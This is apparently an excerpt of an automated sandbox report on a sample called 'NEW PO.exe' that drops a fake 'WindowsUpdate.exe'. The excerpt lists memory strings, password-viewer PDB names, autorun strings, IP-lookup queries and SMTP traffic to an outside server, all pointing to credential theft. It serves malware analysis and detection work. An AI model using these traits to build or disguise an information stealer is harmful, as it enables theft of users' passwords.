Source:	Binary string: fastprox.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: NEW PO.exe, 00000007.00000000.312477071.0000000000ED0000.00000004.00000001.sdmp
Source:	Binary string: wbemsvc.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: winrnr.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Runtime.Remoting.pdb source: NEW PO.exe, 00000007.00000002.366473803.0000000007337000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.340203819.00000000054C0000.00000004.00000001.sdmp
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: onfiguration.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: System.pdb source: NEW PO.exe, 00000007.00000002.366473803.0000000007337000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: ore.ni.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: pnrpnsp.pdb% source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: ore.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdbi source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: WMINet_Utils.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: NEW PO.PDB source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Runtime.Remoting.pdb source: NEW PO.exe, 00000007.00000002.366422934.00000000072F0000.00000004.00000001.sdmp
Source:	Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: .pdbI source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: .pdb source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp, WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: comctl32.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wbemprox.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdbA source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: edputil.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp

Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	Binary or memory string: autorun.inf
Source: NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	Binary or memory string: [autorun]
Source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp	Binary or memory string: autorun.inf
Source: WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp	Binary or memory string: [autorun]
Source: WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: WindowsUpdate.exe, 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	Binary or memory string: autorun.inf
Source: WindowsUpdate.exe, 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	Binary or memory string: [autorun]

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,	10_2_00408441
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,	10_2_00407E0E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 11_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,	11_2_00406EC3

Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	7_2_00DEFED9
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 4x nop then jmp 04F7A630h	7_2_04F7A568
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 4x nop then jmp 04F7A630h	7_2_04F7A559
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	7_2_04F79EF5
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	7_2_04F79A2D
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	7_2_04F72B75
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	7_2_07A60584
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	16_2_051B2B75

Networking:

May check the online IP address of the machine

Show sources

Source: C:\Users\user\Desktop\NEW PO.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\Desktop\NEW PO.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\Desktop\NEW PO.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\Desktop\NEW PO.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\Desktop\NEW PO.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	DNS query: name: whatismyipaddress.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.3:49749 -> 194.152.32.10:587

Source: global traffic

TCP traffic: 192.168.2.3:49749 -> 194.152.32.10:587

Source: NEW PO.exe, 00000007.00000000.318091775.0000000002DA0000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.394923991.0000000007AC6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: NEW PO.exe, 00000007.00000000.319973922.0000000007337000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000002.358784291.0000000004DC2000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000002.439124560.0000000007B0D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: WerFault.exe, 0000000D.00000002.358784291.0000000004DC2000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: NEW PO.exe, 00000007.00000000.318091775.0000000002DA0000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.407180919.0000000007AD8000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: WindowsUpdate.exe, 00000010.00000002.359439009.0000000002C41000.00000004.00000001.sdmp	String found in binary or memory: http://foo.com/foo
Source: NEW PO.exe, 00000007.00000000.317987714.0000000002D82000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.391767128.00000000035AF000.00000004.00000001.sdmp	String found in binary or memory: http://mail.inbox.lv
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.318091775.0000000002DA0000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.394923991.0000000007AC6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: NEW PO.exe, 00000007.00000000.318091775.0000000002DA0000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.407180919.0000000007AD8000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: NEW PO.exe, 00000007.00000000.312878482.0000000002AA1000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000002.359439009.0000000002C41000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.398190268.00000000032D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000D.00000003.336142741.0000000005A80000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: vbc.exe, 0000000A.00000003.329000407.0000000002966000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415259804.0000000002A36000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: NEW PO.exe, 00000007.00000000.317839856.0000000002D35000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.399808346.0000000003566000.00000004.00000001.sdmp	String found in binary or memory: http://whatismyipaddress.com
Source: NEW PO.exe, 00000007.00000000.317321122.0000000002B0B000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.390946252.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: http://whatismyipaddress.com/
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://whatismyipaddress.com/-
Source: NEW PO.exe, 00000007.00000000.313150769.0000000002D3E000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.399808346.0000000003566000.00000004.00000001.sdmp	String found in binary or memory: http://whatismyipaddress.com4
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: NEW PO.exe, 00000000.00000002.296655248.000000000336A000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.357016528.0000000002C4C000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373074864.0000000003171000.00000004.00000001.sdmp	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: vbc.exe, 0000000A.00000003.329000407.0000000002966000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415259804.0000000002A36000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: vbc.exe, 0000000A.00000003.329000407.0000000002966000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415259804.0000000002A36000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: vbc.exe, 00000017.00000000.402469174.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: WindowsUpdate.exe, 00000012.00000000.390946252.000000000333C000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000002.435099803.00000000032D1000.00000004.00000001.sdmp	String found in binary or memory: http://www.site.com/logs.php
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: NEW PO.exe, 00000000.00000002.300428712.00000000073D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: vbc.exe, 0000000A.00000003.329276630.000000000059D000.00000004.00000001.sdmp, vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 0000000A.00000003.329666537.0000000002871000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415728585.0000000002941000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: vbc.exe, 0000000A.00000003.331400301.000000000059E000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.419897387.0000000000B6E000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: vbc.exe, 0000000A.00000003.329353144.0000000002963000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415661775.0000000002A36000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: vbc.exe, 0000000A.00000003.331400301.000000000059E000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.419897387.0000000000B6E000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
Source: vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: vbc.exe, 0000000A.00000003.329090592.000000000296F000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415346197.0000000002A3F000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: vbc.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: NEW PO.exe, 00000007.00000000.318091775.0000000002DA0000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.407180919.0000000007AD8000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: vbc.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: vbc.exe, 0000000A.00000003.329000407.0000000002966000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415259804.0000000002A36000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: vbc.exe, 0000000A.00000003.329000407.0000000002966000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415259804.0000000002A36000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: vbc.exe, 0000000A.00000003.329000407.0000000002966000.00000004.00000001.sdmp, vbc.exe, 00000016.00000003.415259804.0000000002A36000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0

Source: unknown

DNS traffic detected: queries for: whatismyipaddress.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 28 Oct 2021 12:43:11 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 6a543f9218035b86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 28 Oct 2021 12:43:47 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 6a5440731a042c52-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020

